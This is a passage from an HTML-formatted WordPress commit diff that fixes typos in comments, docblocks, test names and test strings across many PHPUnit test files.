</span><span class="cx" style="display: block; padding: 0 10px"> * Arguments for testing `get_col()`.
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * @type string|null $query The query to run.
- * @type string|array $expected The resulting expected value.
- * @type arrray|string|null $last_result The value to assign to `$wpdb->last_result`.
- * @type int|string $column The column index to retrieve.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * @type string|null $query The query to run.
+ * @type string|array $expected The resulting expected value.
+ * @type array|string|null $last_result The value to assign to `$wpdb->last_result`.
+ * @type int|string $column The column index to retrieve.
</ins><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function data_get_col() {
</span><span class="cx" style="display: block; padding: 0 10px"> global $wpdb;
</span></span></pre></div>
<a id="trunktestsphpunittestsdependenciesstylesphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/dependencies/styles.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/dependencies/styles.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/dependencies/styles.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -160,7 +160,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * Test if inline styles work with concatination
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * Test if inline styles work with concatenation
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @global WP_Styles $wp_styles
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 24813
</span></span></pre></div>
<a id="trunktestsphpunittestsfiltersphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/filters.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/filters.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/filters.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -313,7 +313,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertFalse( has_filter( 'all', array( $a, 'filterall' ) ) );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertFalse( has_filter( 'all' ) );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( $val, apply_filters( $hook_name, $val ) );
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Call cound should remain at 1.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Call count should remain at 1.
</ins><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 1, $a->get_call_count() );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( array( $hook_name ), $a->get_hook_names() );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span></span></pre></div>
<a id="trunktestsphpunittestsfontsfontlibrarywpRestFontFamiliesControllerphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/fonts/font-library/wpRestFontFamiliesController.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/fonts/font-library/wpRestFontFamiliesController.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/fonts/font-library/wpRestFontFamiliesController.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -382,8 +382,8 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 201, $response->get_status(), 'The response status should be 201.' );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->check_font_family_data( $data, $data['id'], $response->get_links() );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $reponse_settings = $data['font_family_settings'];
- $this->assertSame( $settings, $reponse_settings, 'The expected settings should exist in the font_family_settings data.' );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $response_settings = $data['font_family_settings'];
+ $this->assertSame( $settings, $response_settings, 'The expected settings should exist in the font_family_settings data.' );
</ins><span class="cx" style="display: block; padding: 0 10px"> $this->assertEmpty( $data['font_faces'], 'The font_faces should be empty or not exist in the response data.' );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span></span></pre></div>
<a id="trunktestsphpunittestsformattingcleanPrephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/formatting/cleanPre.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/formatting/cleanPre.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/formatting/cleanPre.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -1,7 +1,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> <?php
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * The clean_pre() removes pararaph and line break
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * The clean_pre() removes paragraph and line break
</ins><span class="cx" style="display: block; padding: 0 10px"> * tags within `<pre>` elements as part of wpautop().
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @group formatting
</span></span></pre></div>
<a id="trunktestsphpunittestsformattingconvertSmiliesphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/formatting/convertSmilies.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/formatting/convertSmilies.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/formatting/convertSmilies.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -55,8 +55,8 @@
</span><span class="cx" style="display: block; padding: 0 10px"> "<strong;)>a little bit of this\na little bit:other: of that \xf0\x9f\x98\x80\n\xf0\x9f\x98\x80 a little bit of good\nyeah with a little bit of bad8O",
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- '<strong style="here comes the sun :-D">and I say it\'s allright:D:D',
- '<strong style="here comes the sun :-D">and I say it\'s allright:D:D',
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ '<strong style="here comes the sun :-D">and I say it\'s alright:D:D',
+ '<strong style="here comes the sun :-D">and I say it\'s alright:D:D',
</ins><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> '<!-- Woo-hoo, I\'m a comment, baby! :x > -->',
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -254,7 +254,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> smilies_init();
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $orig_trans = $wpsmiliestrans; // Save original tranlations array.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $orig_trans = $wpsmiliestrans; // Save original translations array.
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $wpsmiliestrans = array(
</span><span class="cx" style="display: block; padding: 0 10px"> ':)' => 'simple-smile.png',
</span></span></pre></div>
<a id="trunktestsphpunittestsformattingemojiphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/formatting/emoji.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/formatting/emoji.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/formatting/emoji.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -111,7 +111,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> '🙂',
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Bird, ZWJ, black large squre, emoji selector.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Bird, ZWJ, black large square, emoji selector.
</ins><span class="cx" style="display: block; padding: 0 10px"> '🐦⬛',
</span><span class="cx" style="display: block; padding: 0 10px"> '🐦‍⬛',
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span></span></pre></div>
<a id="trunktestsphpunittestsformattingescUrlphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/formatting/escUrl.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/formatting/escUrl.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/formatting/escUrl.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -258,7 +258,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @covers ::sanitize_url
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- public function test_invalid_charaters() {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ public function test_invalid_characters() {
</ins><span class="cx" style="display: block; padding: 0 10px"> $this->assertEmpty( sanitize_url( '"^<>{}`' ) );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span></span></pre></div>
<a id="trunktestsphpunittestsformattingmakeClickablephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/formatting/makeClickable.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/formatting/makeClickable.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/formatting/makeClickable.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -256,8 +256,8 @@
</span><span class="cx" style="display: block; padding: 0 10px"> 'expected' => 'Example: WordPress, test (some text), I love example.com (<a href="http://example.com" rel="nofollow">http://example.com</a>), it is brilliant',
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> 'real world: (URL)...' => array(
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- 'text' => 'Some text followed by a bracketed link with a trailing elipsis (http://example.com)...',
- 'expected' => 'Some text followed by a bracketed link with a trailing elipsis (<a href="http://example.com" rel="nofollow">http://example.com</a>)...',
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ 'text' => 'Some text followed by a bracketed link with a trailing ellipsis (http://example.com)...',
+ 'expected' => 'Some text followed by a bracketed link with a trailing ellipsis (<a href="http://example.com" rel="nofollow">http://example.com</a>)...',
</ins><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> 'real world: (here: URL)' => array(
</span><span class="cx" style="display: block; padding: 0 10px"> 'text' => 'In his famous speech “You and Your research” (here: http://www.cs.virginia.edu/~robins/YouAndYourResearch.html) Richard Hamming wrote about people getting more done with their doors closed...',
</span></span></pre></div>
<a id="trunktestsphpunittestsformattingsanitizeTextFieldphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/formatting/sanitizeTextField.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/formatting/sanitizeTextField.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/formatting/sanitizeTextField.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -103,15 +103,15 @@
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> '%AB%BC%DE', // Just octets.
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- '', // Emtpy as we strip all the octets out.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ '', // Empty as we strip all the octets out.
</ins><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- 'Invalid octects remain %II',
- 'Invalid octects remain %II',
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ 'Invalid octets remain %II',
+ 'Invalid octets remain %II',
</ins><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- 'Nested octects %%%ABABAB %A%A%ABBB',
- 'Nested octects',
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ 'Nested octets %%%ABABAB %A%A%ABBB',
+ 'Nested octets',
</ins><span class="cx" style="display: block; padding: 0 10px"> ),
</span><span class="cx" style="display: block; padding: 0 10px"> array(
</span><span class="cx" style="display: block; padding: 0 10px"> array(),
</span></span></pre></div>
<a id="trunktestsphpunittestsformattingwpAutopphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/formatting/wpAutop.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/formatting/wpAutop.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/formatting/wpAutop.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -567,7 +567,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- * wpautop() should convert multiple line breaks into a paragraph regarless of <br /> format
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ * wpautop() should convert multiple line breaks into a paragraph regardless of <br /> format
</ins><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 33377
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span></span></pre></div>
<a id="trunktestsphpunittestsfunctionscleanDirsizeCachephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/functions/cleanDirsizeCache.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/functions/cleanDirsizeCache.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/functions/cleanDirsizeCache.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -88,7 +88,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> 'path' => 'string',
</span><span class="cx" style="display: block; padding: 0 10px"> 'expected_count' => 1,
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- 'non-existant string, but non-path' => array(
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ 'non-existent string, but non-path' => array(
</ins><span class="cx" style="display: block; padding: 0 10px"> 'path' => 'doesnotexist',
</span><span class="cx" style="display: block; padding: 0 10px"> 'expected_count' => 2,
</span><span class="cx" style="display: block; padding: 0 10px"> ),
</span></span></pre></div>
<a id="trunktestsphpunittestsfunctionswpMysqlWeekphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/functions/wpMysqlWeek.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/functions/wpMysqlWeek.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/functions/wpMysqlWeek.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -7,7 +7,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> *
</span><span class="cx" style="display: block; padding: 0 10px"> * @covers ::_wp_mysql_week
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">-class Tests_Functons_WpMysqlWeek extends WP_UnitTestCase {
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+class Tests_Functions_WpMysqlWeek extends WP_UnitTestCase {
</ins><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span><span class="cx" style="display: block; padding: 0 10px"> * @ticket 59931
</span></span></pre></div>
<a id="trunktestsphpunittestsfunctionsphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/functions.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/functions.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/functions.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -263,7 +263,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> // Test slashes in names.
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 'abcdefg.png', wp_unique_filename( $testdir, 'abcde\fg.png' ), 'Slash not removed' );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( 'abcdefg.png', wp_unique_filename( $testdir, 'abcde\\fg.png' ), 'Double slashed not removed' );
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $this->assertSame( 'abcdefg.png', wp_unique_filename( $testdir, 'abcde\\\fg.png' ), 'Tripple slashed not removed' );
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $this->assertSame( 'abcdefg.png', wp_unique_filename( $testdir, 'abcde\\\fg.png' ), 'Triple slashed not removed' );
</ins><span class="cx" style="display: block; padding: 0 10px"> }
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> /**
</span></span></pre></div>
<a id="trunktestsphpunittestshttphttpphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/http/http.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/http/http.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/http/http.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -47,7 +47,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> array( '../file-in-parent.ext', 'http://example.com/directory/', 'http://example.com/file-in-parent.ext' ),
</span><span class="cx" style="display: block; padding: 0 10px"> array( '../file-in-parent.ext', 'http://example.com/directory/filename', 'http://example.com/file-in-parent.ext' ),
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Location provided in muliple levels higher, including impossible to reach (../ below DOCROOT).
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Location provided in multiple levels higher, including impossible to reach (../ below DOCROOT).
</ins><span class="cx" style="display: block; padding: 0 10px"> array( '../../file-in-grand-parent.ext', 'http://example.com', 'http://example.com/file-in-grand-parent.ext' ),
</span><span class="cx" style="display: block; padding: 0 10px"> array( '../../file-in-grand-parent.ext', 'http://example.com/filename', 'http://example.com/file-in-grand-parent.ext' ),
</span><span class="cx" style="display: block; padding: 0 10px"> array( '../../file-in-grand-parent.ext', 'http://example.com/directory/', 'http://example.com/file-in-grand-parent.ext' ),
</span></span></pre></div>
<a id="trunktestsphpunittestsimageheaderphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/image/header.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/image/header.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/image/header.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -140,7 +140,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> )
</span><span class="cx" style="display: block; padding: 0 10px"> );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Create inital crop object.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Create initial crop object.
</ins><span class="cx" style="display: block; padding: 0 10px"> $cropped_1 = 'foo-cropped-1.png';
</span><span class="cx" style="display: block; padding: 0 10px"> $object = wp_copy_parent_attachment_properties( $cropped_1, $id, 'custom-header' );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -148,7 +148,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> $previous = $this->custom_image_header->get_previous_crop( $object );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertFalse( $previous );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Create the inital crop attachment and set it as the header.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Create the initial crop attachment and set it as the header.
</ins><span class="cx" style="display: block; padding: 0 10px"> $cropped_1_id = $this->custom_image_header->insert_attachment( $object, $cropped_1 );
</span><span class="cx" style="display: block; padding: 0 10px"> $key = '_wp_attachment_custom_header_last_used_' . get_stylesheet();
</span><span class="cx" style="display: block; padding: 0 10px"> update_post_meta( $cropped_1_id, $key, time() );
</span></span></pre></div>
<a id="trunktestsphpunittestsimageintermediateSizephp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/image/intermediateSize.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/image/intermediateSize.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/image/intermediateSize.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -114,7 +114,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * @requires function imagejpeg
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_get_intermediate_sizes_by_array_exact() {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Only one dimention match shouldn't return false positive (see: #17626).
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Only one dimension match shouldn't return false positive (see: #17626).
</ins><span class="cx" style="display: block; padding: 0 10px"> add_image_size( 'test-size', 330, 220, true );
</span><span class="cx" style="display: block; padding: 0 10px"> add_image_size( 'false-height', 330, 400, true );
</span><span class="cx" style="display: block; padding: 0 10px"> add_image_size( 'false-width', 600, 220, true );
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -184,7 +184,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> // Use this width.
</span><span class="cx" style="display: block; padding: 0 10px"> $width = 300;
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Only one dimention match shouldn't return false positive (see: #17626).
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Only one dimension match shouldn't return false positive (see: #17626).
</ins><span class="cx" style="display: block; padding: 0 10px"> add_image_size( 'test-size', $width, 0, false );
</span><span class="cx" style="display: block; padding: 0 10px"> add_image_size( 'false-height', $width, 100, true );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -213,7 +213,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> // 202 is the smallest height that will trigger a miss for 'false-height'.
</span><span class="cx" style="display: block; padding: 0 10px"> $height = 202;
</span><span class="cx" style="display: block; padding: 0 10px">
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // Only one dimention match shouldn't return false positive (see: #17626).
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // Only one dimension match shouldn't return false positive (see: #17626).
</ins><span class="cx" style="display: block; padding: 0 10px"> add_image_size( 'test-size', 0, $height, false );
</span><span class="cx" style="display: block; padding: 0 10px"> add_image_size( 'false-height', 300, $height, true );
</span><span class="cx" style="display: block; padding: 0 10px">
</span></span></pre></div>
<a id="trunktestsphpunittestsimagemetaphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/image/meta.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/image/meta.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/image/meta.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -98,7 +98,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_exif_error() {
</span><span class="cx" style="display: block; padding: 0 10px"> // https://core.trac.wordpress.org/ticket/6571
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- // This triggers a warning mesage when reading the Exif block.
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ // This triggers a warning message when reading the Exif block.
</ins><span class="cx" style="display: block; padding: 0 10px"> $out = wp_read_image_metadata( DIR_TESTDATA . '/images/waffles.jpg' );
</span><span class="cx" style="display: block; padding: 0 10px">
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertSame( '0', $out['aperture'], 'Aperture value not equivalent' );
</span></span></pre></div>
<a id="trunktestsphpunittestsinteractivityapiwpInteractivityAPIphp"></a>
<div class="modfile"><h4 style="background-color: #eee; color: inherit; margin: 1em 0; padding: 1.3em; font-size: 115%">Modified: trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPI.php</h4>
<pre class="diff"><span>
<span class="info" style="display: block; padding: 0 10px; color: #888">--- trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPI.php 2024-04-12 12:15:58 UTC (rev 57986)
+++ trunk/tests/phpunit/tests/interactivity-api/wpInteractivityAPI.php 2024-04-12 17:45:23 UTC (rev 57987)
</span><span class="lines" style="display: block; padding: 0 10px; color: #888">@@ -549,7 +549,7 @@
</span><span class="cx" style="display: block; padding: 0 10px"> * @covers ::process_directives
</span><span class="cx" style="display: block; padding: 0 10px"> */
</span><span class="cx" style="display: block; padding: 0 10px"> public function test_process_directives_doesnt_fail_with_unknown_directives() {
</span><del style="background-color: #fdd; text-decoration:none; display:block; padding: 0 10px">- $html = '<div data-wp-uknown="">Text</div>';
</del><ins style="background-color: #dfd; text-decoration:none; display:block; padding: 0 10px">+ $html = '<div data-wp-unknown="">Text</div>';
</ins><span class="cx" style="display: block; padding: 0 10px"> $processed_html = $this->interactivity->process_directives( $html );
</span><span class="cx" style="display: block; padding: 0 10px"> $this->assertEquals( $html, $processed_html );
</span><span class="cx" style="display: block; padding: 0 10px"> }
</span></span></pre></div>
